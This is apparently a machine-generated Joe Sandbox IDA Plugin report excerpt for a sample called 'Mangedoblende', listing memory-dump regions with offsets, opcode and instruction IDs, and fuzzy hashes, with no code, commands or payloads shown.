                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5f14d984664faf3209f85bbd08048ffef4d08e4da8c804f2f586732e9e607461
                                                                                                                                                                            • Instruction ID: 2ae2b3f0dbe1193015a2816d183505a3de459ed950d0c32480d748fad0e0c52f
                                                                                                                                                                            • Opcode Fuzzy Hash: 5f14d984664faf3209f85bbd08048ffef4d08e4da8c804f2f586732e9e607461
                                                                                                                                                                            • Instruction Fuzzy Hash: 25919B74A00609DFCF25DF98C4848EDBBB2FF88310F51856AE815AB225D735AA55CF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f1a5429aa656dc670b61228a7bd5ca9622f303d65a877c9ba1c74111563aeeae
                                                                                                                                                                            • Instruction ID: 4866591542d381669eba66ec12eee6a0ff8071aa3d36166e0e0404ad7329ff47
                                                                                                                                                                            • Opcode Fuzzy Hash: f1a5429aa656dc670b61228a7bd5ca9622f303d65a877c9ba1c74111563aeeae
                                                                                                                                                                            • Instruction Fuzzy Hash: 387139347006198FCB25EF68C888A6E7BE6AF99341B5900A9E816DB371DF74DD41CF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0ab0d96d2d7809da387dfb78593edb912a91c620844ffbf23ccaad52b2e6f226
                                                                                                                                                                            • Instruction ID: ca1c89798279b7a8d544bcc941f6ecec7016f03014ae7cb872337ffbb9893bf8
                                                                                                                                                                            • Opcode Fuzzy Hash: 0ab0d96d2d7809da387dfb78593edb912a91c620844ffbf23ccaad52b2e6f226
                                                                                                                                                                            • Instruction Fuzzy Hash: C2819274E412288FDB65DF25CD51BDDBBB2AF89300F1080EAE958A7260DB315E81CF40
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 605b8b67791ba57411904e41c836673f687bc3c53d8b1e5d924bda0c6924aca1
                                                                                                                                                                            • Instruction ID: 9a51688e0782c0a5992b4131669497c64bf742b0e46458dc8c7c949225d91b20
                                                                                                                                                                            • Opcode Fuzzy Hash: 605b8b67791ba57411904e41c836673f687bc3c53d8b1e5d924bda0c6924aca1
                                                                                                                                                                            • Instruction Fuzzy Hash: 9131F274E00208CFDB08CFAAC9406DEBBF2BF89300F14D12AD418AB268DB349946CF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e197c3329538e286122d6a7ec8f9195b681ffaf6f12114a670db1a431e0dafbc
                                                                                                                                                                            • Instruction ID: 8d545d59df4821951e089639f9d121dfdec4fa696246bdd685ba6879c318648b
                                                                                                                                                                            • Opcode Fuzzy Hash: e197c3329538e286122d6a7ec8f9195b681ffaf6f12114a670db1a431e0dafbc
                                                                                                                                                                            • Instruction Fuzzy Hash: 8931D274E05248CFDB04CFAAC9506DEBBF2AF89300F24D42AC418BB268DB749942CF55
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f25f9a84fc503985e8d0c8fd922f3243e6f14f4871074ff235f1f072a1b4d081
                                                                                                                                                                            • Instruction ID: 2b689b02ddcb2d9562d590e0595c05996ae6d335ccbb6239d5ff9a2d1ba4e8a7
                                                                                                                                                                            • Opcode Fuzzy Hash: f25f9a84fc503985e8d0c8fd922f3243e6f14f4871074ff235f1f072a1b4d081
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A31E374E01658CFDB08CFAAD9406EDBBF2AF99300F10D12AD418AB269DB349946CF54
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e221c0b4768c37c2f5ced1ff81dce6585f057b1b59232822433a7f8a4b644fb0
                                                                                                                                                                            • Instruction ID: f65b786b88849114bed3bdbe2fbe79d1d81dc3d5f86076258ee76cb427aa3c28
                                                                                                                                                                            • Opcode Fuzzy Hash: e221c0b4768c37c2f5ced1ff81dce6585f057b1b59232822433a7f8a4b644fb0
                                                                                                                                                                            • Instruction Fuzzy Hash: F33103B5D00228CFDB14CFA6D59469DBBF2BF89304F20C06AC058AB294EB389842CF14
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 7028ae21535cd8db3c74b23fd9485d18972ad60a9c8a84e07f49ea881873e627
                                                                                                                                                                            • Instruction ID: e920691c2aa8212d35e50bea4d3123b4e9fb90f541a5ce811aaf00b640ed6cc7
                                                                                                                                                                            • Opcode Fuzzy Hash: 7028ae21535cd8db3c74b23fd9485d18972ad60a9c8a84e07f49ea881873e627
                                                                                                                                                                            • Instruction Fuzzy Hash: 0321F6323042164BDB157A79849473E3297AFC4749FA58039D802CB7A9EF79CD42DB81
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ef30a24c14a91e6301e772d84884548d5b5bb5c6326e36ca859e0ee8a49d7b20
                                                                                                                                                                            • Instruction ID: c1046fbca88315a5c01fc8be27ab8aeb268b613a2a73f8a22d5c9bbeb5c65d48
                                                                                                                                                                            • Opcode Fuzzy Hash: ef30a24c14a91e6301e772d84884548d5b5bb5c6326e36ca859e0ee8a49d7b20
                                                                                                                                                                            • Instruction Fuzzy Hash: 8B31C1316042458FEF15DF68C848B6ABFF1AF85310F0981A6E459DB2A2D3B4ED40CF62
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351146261.0000000022840000.00000040.00000800.00020000.00000000.sdmp, Offset: 22840000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22840000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8c31a847a9db6e6a685f336c63c86c0606733c7c5d13af7f2014b7be1ca9c16d
                                                                                                                                                                            • Instruction ID: 38a12b2ee922faa50fc39f7f393bea8c7926c12129eb407116d93c77f9a20720
                                                                                                                                                                            • Opcode Fuzzy Hash: 8c31a847a9db6e6a685f336c63c86c0606733c7c5d13af7f2014b7be1ca9c16d
                                                                                                                                                                            • Instruction Fuzzy Hash: 9F31A574D01658CFDB04DFAAD9406DDBBF2AF89300F64D12AD418BB264DB349942CF54
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2c7f8c424c25749f8d1555769723ea4a506e3d20d5150a067a8e9a0fe91df1a5
                                                                                                                                                                            • Instruction ID: f2aced27c7b7e71fbebb78949c158648187512ef8138cfb4b4e53021db4fd270
                                                                                                                                                                            • Opcode Fuzzy Hash: 2c7f8c424c25749f8d1555769723ea4a506e3d20d5150a067a8e9a0fe91df1a5
                                                                                                                                                                            • Instruction Fuzzy Hash: 39217C35E002259FCB16DB24C940AAE77A5EBDD364F608019D80A9B264DB34EE42CBD0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3332860487.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_9d000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ae93b66653326a8c58cebec8f53e1dd7a3fc9a2efbf4aa8196a85959f3f44462
                                                                                                                                                                            • Instruction ID: 63ed667782708052071e685d44ab7665e78dcf77d054d029f01292637afde6ff
                                                                                                                                                                            • Opcode Fuzzy Hash: ae93b66653326a8c58cebec8f53e1dd7a3fc9a2efbf4aa8196a85959f3f44462
                                                                                                                                                                            • Instruction Fuzzy Hash: 332137B1544240DFCF15DF14D9C0F2ABFA5FB98324F24C56AE9090B246C336D816EBA2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 1bbe91eac57e6f4ff659f32e94d6488855a646a77d01a3685caa005eedbf2fd8
                                                                                                                                                                            • Instruction ID: d41212ef79b2b20f1be199952a756ced54b941e7efb9657ea0bff7d71ad1b9c0
                                                                                                                                                                            • Opcode Fuzzy Hash: 1bbe91eac57e6f4ff659f32e94d6488855a646a77d01a3685caa005eedbf2fd8
                                                                                                                                                                            • Instruction Fuzzy Hash: CE21E7357009119FC729AB29C45492EB3A6FFC97517154138EC0ACB358CF34DD028F80
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3332904191.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Opcode Fuzzy Hash: 749951938fe8a7a14a06d9741f2f73223dec6aaa098dce0154bb6cfd65f28983
                                                                                                                                                                            • Instruction Fuzzy Hash: 08018B327005146BCB29EE599811AAF7BABDBC8750F148015F915D7248DF75CE219FD0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: bd7c0dba602d800f75046604e5b6148d5f7cd8e1ff8c6ac4c6d4e940647761d3
                                                                                                                                                                            • Instruction ID: 8e155c7c808f953480788231470ab4fad3ff61e78124360b5d56ccf108003411
                                                                                                                                                                            • Opcode Fuzzy Hash: bd7c0dba602d800f75046604e5b6148d5f7cd8e1ff8c6ac4c6d4e940647761d3
                                                                                                                                                                            • Instruction Fuzzy Hash: 71011A74E0460AAFCB01DFA4D9849AEFBB6FB89311F108165E910A3360D7789A15DF91
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 310a99d24c5e75be358a55e54c26db085e057b303c06c4fba817aa59e5032fc0
                                                                                                                                                                            • Instruction ID: a0a8aee08dbc12b8c5e9d81843668c8b2262c8ec39d84d5d966ed910332b7553
                                                                                                                                                                            • Opcode Fuzzy Hash: 310a99d24c5e75be358a55e54c26db085e057b303c06c4fba817aa59e5032fc0
                                                                                                                                                                            • Instruction Fuzzy Hash: 6401F275E00219CFCF45EFB9C901AEEBBF5BF48200F10816AD519F7250E73899018BA0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3c6e171c34484cdb9efd3410ab2958832265aeb29726f80e08c25858f6b6ebf3
                                                                                                                                                                            • Instruction ID: 78a4a6acbeaa5f59964e1a3eed7f45bfa784b852f3652408139ef570497f1f76
                                                                                                                                                                            • Opcode Fuzzy Hash: 3c6e171c34484cdb9efd3410ab2958832265aeb29726f80e08c25858f6b6ebf3
                                                                                                                                                                            • Instruction Fuzzy Hash: F3F0B43A3083048FCB099B29D955D1A7BBAEFCA650B1504EAF509CB2B3EA20DC00C790
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5ce5201e20070f13fc8d3c0db0d9f678f7b5b2b647b04666514dbecbaed3ecf0
                                                                                                                                                                            • Instruction ID: 3badb3854eb02e620e339e4011da9ef28ed6c7ce13196233d5981f1bc96ead30
                                                                                                                                                                            • Opcode Fuzzy Hash: 5ce5201e20070f13fc8d3c0db0d9f678f7b5b2b647b04666514dbecbaed3ecf0
                                                                                                                                                                            • Instruction Fuzzy Hash: 6CF082393002148FD7089B3ADA54A2A77AAEFC5710B1040A9F509CB3A2DE30DC01C790
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 04e41b11ebfa0fdc0f86054737f49262f4a8817cd28ea19b56184d6cdc9b3eb4
                                                                                                                                                                            • Instruction ID: 3e04cc67ced5e1cd17bacf2c6bc837a826d9f261958fdf57b8a28946761a2e3b
                                                                                                                                                                            • Opcode Fuzzy Hash: 04e41b11ebfa0fdc0f86054737f49262f4a8817cd28ea19b56184d6cdc9b3eb4
                                                                                                                                                                            • Instruction Fuzzy Hash: 06F08C32A101189FCB04DF699808AFEBBF5EBC8321F14C12AE918D3264D3314A158F90
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: dc2e8a47abca32a0a3ebd777ebcc98a5ea89c89d542a18b120fbceab6b5a3370
                                                                                                                                                                            • Instruction ID: 76d9aacf60042319cf9b79354a9198ec10cb824187e02f6c0f2951c7f05ee307
                                                                                                                                                                            • Opcode Fuzzy Hash: dc2e8a47abca32a0a3ebd777ebcc98a5ea89c89d542a18b120fbceab6b5a3370
                                                                                                                                                                            • Instruction Fuzzy Hash: 9EE0C232D2022B8ACB10ABA4EC444EEFB34FED5351B814636D02076040EB30169AC6A0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0dd205f0dfd06a01d78acd006ff686517ee2ec5e955cb107890bb505723a696c
                                                                                                                                                                            • Instruction ID: 029bc0a622d6c8ecf8e7d7f29d452ea5785f4d4c389dded27e885aa293771617
                                                                                                                                                                            • Opcode Fuzzy Hash: 0dd205f0dfd06a01d78acd006ff686517ee2ec5e955cb107890bb505723a696c
                                                                                                                                                                            • Instruction Fuzzy Hash: AFD05E32D2032B97CB00EBA5EC048EFFB38EED6261B958626D52437154FB702659C6E1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c9bd4ab73508ba573c7048a4f98628d98d3b83a04a7ae6dcc2b0b2536d4c5236
                                                                                                                                                                            • Instruction ID: 44e7980a1976a1f381adc37a37fe3cca3cb7b3d63875bcc790f549fdd833bd00
                                                                                                                                                                            • Opcode Fuzzy Hash: c9bd4ab73508ba573c7048a4f98628d98d3b83a04a7ae6dcc2b0b2536d4c5236
                                                                                                                                                                            • Instruction Fuzzy Hash: BBC0123324D1242E9625204E7C809A3774DC3D63B4A661137FA1CD3200DC425C8002E4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9a0fec5d3d3288feb22ba2c0243cab043ae0376dc4f7379989771452cd73dfbe
                                                                                                                                                                            • Instruction ID: 57b1de50afeadcb433e48a1d3c0772104217b548141fc241ccdabc2b2c7cc397
                                                                                                                                                                            • Opcode Fuzzy Hash: 9a0fec5d3d3288feb22ba2c0243cab043ae0376dc4f7379989771452cd73dfbe
                                                                                                                                                                            • Instruction Fuzzy Hash: 56D04275E4410DCBCB24DFB8E4884DCBB71EF59321B20546AD925E3251E63455658F11
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f57f30d79a26793ace2a651a074146d821ce3fa0f2535fff15a4695b151edaa6
                                                                                                                                                                            • Instruction ID: ceab4ea2608a2aead5d3d25e96176f550f5d0428cf538702b2b58e24634f2c06
                                                                                                                                                                            • Opcode Fuzzy Hash: f57f30d79a26793ace2a651a074146d821ce3fa0f2535fff15a4695b151edaa6
                                                                                                                                                                            • Instruction Fuzzy Hash: D5D0673AB400189FCB149F98E844CDDF776FB98221B048117E915A3265C7319965DB50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6101b2b7b620c4413f949581e1e2b01ca2b11263680ed4761ddf25d49d35f137
                                                                                                                                                                            • Instruction ID: a421250d64191bf2e2a65e617108897983f5f5ab930563b10af706f01be2d2f5
                                                                                                                                                                            • Opcode Fuzzy Hash: 6101b2b7b620c4413f949581e1e2b01ca2b11263680ed4761ddf25d49d35f137
                                                                                                                                                                            • Instruction Fuzzy Hash: D2D19F74E04318CFDB55DFA5C984B9DBBB2BF89300F2081A9D408A72A5DB359E81DF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 6804c5f487fa441ffb6c99a86402db213c8be6bb35492b73a795996a6984735f
                                                                                                                                                                            • Instruction ID: da88da64a8592bceabfadfebeefa3f7f9ea351ff79e1dd74b54943591da94594
                                                                                                                                                                            • Opcode Fuzzy Hash: 6804c5f487fa441ffb6c99a86402db213c8be6bb35492b73a795996a6984735f
                                                                                                                                                                            • Instruction Fuzzy Hash: 71D19F74E00318CFDB15DFA5C994B9DBBB2BF89304F2081A9D408AB2A5DB349E81DF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 783741bc9fdc20b693d17fa0501b12dc7176c66a6a2b05c5074e35343e04ca7c
                                                                                                                                                                            • Instruction ID: 2eb9a591269b6da94532a49fd969c0714dbef3205742e8cd036447212a420da1
                                                                                                                                                                            • Opcode Fuzzy Hash: 783741bc9fdc20b693d17fa0501b12dc7176c66a6a2b05c5074e35343e04ca7c
                                                                                                                                                                            • Instruction Fuzzy Hash: 07D19E74E01318CFDB55DFA5C984B9DBBB2BF89300F6081A9D408AB2A5DB349E81DF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: ae16656043e220b0c96a668e47bf0cbbe24affa8a474298d86eb5c458b6ff193
                                                                                                                                                                            • Instruction ID: e0bd9bee014af794598c8cf6acd7dee6d747160d0e500518502cbc7bfad35e1c
                                                                                                                                                                            • Opcode Fuzzy Hash: ae16656043e220b0c96a668e47bf0cbbe24affa8a474298d86eb5c458b6ff193
                                                                                                                                                                            • Instruction Fuzzy Hash: 66D18074E00318CFDB55DFA5C994B9DBBB2BF89300F2081A9D408AB2A5DB359E81DF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 90c381c44310008cfd365fa97cd62e4f03c2f1a618846fe903b815720f257231
                                                                                                                                                                            • Instruction ID: bf7e5095c3887835118f6360762cd4080a4597ff3285bcf7b0645bfd8e20942c
                                                                                                                                                                            • Opcode Fuzzy Hash: 90c381c44310008cfd365fa97cd62e4f03c2f1a618846fe903b815720f257231
                                                                                                                                                                            • Instruction Fuzzy Hash: EED19F74E04318CFDB15DFA5C994B9DBBB2BF89300F2081A9D408AB2A5DB359E81DF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2e89266df423d6b1c44a8213deef775a4dd669a585d74ba3d3eab860b1299ba9
                                                                                                                                                                            • Instruction ID: 41e9c61d1db4bb366092035a5f98aba758779294fa856fb9909cbfad9d7e7188
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e89266df423d6b1c44a8213deef775a4dd669a585d74ba3d3eab860b1299ba9
                                                                                                                                                                            • Instruction Fuzzy Hash: 7AD18F74E01318CFDB55DFA5C994B9DBBB2BF89300F2081A9D409AB2A5DB349E81DF50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350992406.0000000022810000.00000040.00000800.00020000.00000000.sdmp, Offset: 22810000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22810000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
